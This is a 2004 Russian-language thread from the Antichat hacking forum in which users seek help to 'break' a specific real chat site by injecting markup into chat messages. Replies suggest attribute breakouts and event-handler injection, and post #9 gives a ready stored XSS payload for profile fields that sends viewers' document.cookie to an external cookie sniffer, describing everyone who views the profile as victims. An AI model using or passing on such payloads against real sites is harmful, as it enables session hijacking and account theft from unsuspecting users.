ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.08.2004, 21:13
Аватар для Thief
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

Фишка №1. В чате разрешен тэг font, точнее только font color, но это только кажется . Итак, пишем прямо в тексте сообщения <font color='00ff00" size=6 face=Impact "'>Hi all!</font>. Что получится из этого, думаю, ясно.

А теперь продолжим эту идею: <font color='00ff00" style="font-size:200px;font-family:Impact;background:url(http://бесплатный сервак.ру/картинка.гиф)" "'>Hi all!</font>

Поидее должны получить текст в 200 пикселей с фоновой картинкой.
Проверьте всё ли я правильно написал, скажите ошибки в тегах пожалуйста. Спасибо. Кстати чат asp.
 
Ответить с цитированием

  #2  
Старый 07.08.2004, 09:14
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию

линк на чат дай, посмотрим, скажем....
 
Ответить с цитированием

  #3  
Старый 07.08.2004, 11:22
Аватар для Fr1k
Fr1k
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191

Репутация: 13
Отправить сообщение для Fr1k с помощью ICQ
По умолчанию

Та прививильно правилльно.

Но я предепочёл бы по лучше способ
<font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px;color:#000000;FONT-FAMILY:arial;background:url(http://image)'>ФРИК</font>
 
Ответить с цитированием

  #4  
Старый 07.08.2004, 11:23
Аватар для Fr1k
Fr1k
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191

Репутация: 13
Отправить сообщение для Fr1k с помощью ICQ
По умолчанию

да! и посмотреть чат желательно б!
 
Ответить с цитированием

  #5  
Старый 07.08.2004, 12:22
Аватар для Fr1k
Fr1k
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191

Репутация: 13
Отправить сообщение для Fr1k с помощью ICQ
По умолчанию

Ну а если толоко вать уже с тэгом фонт, то он как и любой тэг может использовать событие тоесть <font onclick=alert("Текст...пробел нужно использовать через юни  &quot>ну и т.д. так же как и onmoseower и т.д.
 
Ответить с цитированием

  #6  
Старый 09.08.2004, 20:53
Аватар для Thief
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

Название чата http://www.ostrovok.net/ вам распечат в html вот смотрите <html>
<head>
<title>Островок.net - Первый чат на Сахалине.</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
&nbsp;<!--
&nbsp; p,td,li { &nbsp;font-family: Arial, Helvetica, sans-serif}
&nbsp;-->
&lt;/style&gt;
<script language=&quot;JavaScript&quot; src=&quot;functions.js&quot;&gt;&lt;/script&gt;
<script language=&quot;JavaScript&quot;&gt;
<!---
mtick=0;
utick=0;
function RefreshFrames(a) {
if(a!='auto&#39 { top.mess.location.reload(); top.users.location.reload(); }
else {
if(mtick&gt;=39) { top.mess.location.href='http://www.ostrovok.net/mess.php'; mtick=0; }
else { mtick++; }
if(utick&gt;=79) { top.users.location.href='http://www.ostrovok.net/users.php'; utick=0; }
else { utick++; }
}
window.setTimeout(&quot;RefreshFrames('auto&#39&quot;,1000);
}
//-->
&lt;/SCRIPT&gt;
&lt;/head&gt;
&lt;frameset rows=&quot;*,110&quot; frameborder=&quot;No&quot; framespacing=0 bordercolor=&quot;#000000&quot; border=0 onLoad=&quot;javascript:RefreshFrames('auto&#39;&quot;&quot;&gt;
&nbsp;&lt;frameset cols=&quot;*,200&quot;&gt;
&nbsp; &nbsp;&lt;frame name=&quot;mess&quot; scrolling=&quot;yes&quot; src=&quot;mess.php&quot; frameborder=0 marginheight=0 marginwidth=0&gt;
&nbsp; &nbsp;&lt;frame name=&quot;users&quot; src=&quot;users.php&quot; frameborder=0 marginheight=0 marginwidth=0&gt;
&nbsp;&lt;/frameset&gt;
&nbsp;&lt;frame name=&quot;input&quot; scrolling=&quot;NO&quot; noresize &nbsp;frameborder=0 marginheight=0 marginwidth=0
src=&quot;input.php?&amp;str=&quot;&gt;
&lt;/frameset&gt;
&lt;noframes&gt;&lt;body bgcolor=&quot;#FFFFFF&quot;&gt;&lt;br&gt;
Your browser not support frames.
&lt;/body&gt;&lt;/noframes&gt;
&lt;/html&gt;




я вставил в текст &lt;font align=center STYLE='filter:Glow(Color=#FBA2AF);width:200;FONT-SIZE:62px;color:#000000;FONT-FAMILY:arial;background:url(http://image)'&gt;ФРИК&lt;/font&gt;

В тексте появилось только слово Фрик и что это значит вообщем помогите поломать чат.
 
Ответить с цитированием

  #7  
Старый 10.08.2004, 01:38
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Короче, так просто всё не выйдет, вы и так уже всё сами поняли.
И с чего вы взяли, что он фонт колор пропускает?
 
Ответить с цитированием

  #8  
Старый 10.08.2004, 05:11
Аватар для Thief
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

Незнаю может пропускает а что пропускает подскажите пожалуйстка. Как его поломать.
 
Ответить с цитированием

  #9  
Старый 10.08.2004, 11:47
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию

если в своей инфе указать
URL http://z.ru`&quot; z=`
А о себе ` style=&quot;background:url(javascript:x=new Image()\;x.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie)&quot; z

то любой кто просмотрит вашу инфу в чате
становятся вашими невольными жертвами

http://antichat.ru/sniff/log.php
 
Ответить с цитированием

  #10  
Старый 10.08.2004, 21:51
Аватар для Thief
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
Провел на форуме:
68289

Репутация: 2
По умолчанию

А поломать такой чат возможно?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ